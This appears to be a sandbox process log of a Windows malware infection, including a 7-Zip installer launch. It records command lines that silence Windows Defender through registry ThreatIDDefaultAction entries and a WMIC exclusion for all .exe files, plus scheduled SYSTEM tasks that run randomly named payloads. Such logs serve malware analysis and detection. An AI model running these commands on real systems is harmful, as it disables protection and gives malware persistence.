C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4600 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\CwUhZBcq\qQiyUzs.exe
"C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\CwUhZBcq\qQiyUzs.exe" /S ZW
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4588 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:8
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "CBcZQdSiLQyVhMGrO"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4520 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2704 -ip 2704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 1940
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3268 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3656 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4276 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:1
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3124 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5184 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:8
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bsuAwLimisXNmJFuDt" /SC once /ST 01:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\CwUhZBcq\qQiyUzs.exe\" gs /S" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C schtasks /run /I /tn bsuAwLimisXNmJFuDt"
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bsuAwLimisXNmJFuDt
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bsuAwLimisXNmJFuDt
C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\CwUhZBcq\qQiyUzs.exe
C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\CwUhZBcq\qQiyUzs.exe gs /S
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 --field-trial-handle=1916,i,10817037485768794504,8605760317072663638,131072 /prefetch:8
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\7z2401.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "iHAtfpaAUcCnRIDUD" /SC once /ST 00:17:43 /RU "SYSTEM" /TR "\"C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\MDeMLSm.exe\" O3 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "iHAtfpaAUcCnRIDUD"
C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\MDeMLSm.exe
C:\Windows\Temp\kfVVvYGwFixDeWua\SaDyIPolDLsxFBT\MDeMLSm.exe O3 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1264 -ip 1264
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 808
C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\CwUhZBcq\qQiyUzs.exe
C:\Users\Admin\AppData\Local\Temp\fxOKoyyHlNSuGrqrh\CwUhZBcq\qQiyUzs.exe gs /S
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2892 --field-trial-handle=2904,i,18074322322295882051,5199891644126132132,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3036 --field-trial-handle=2904,i,18074322322295882051,5199891644126132132,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
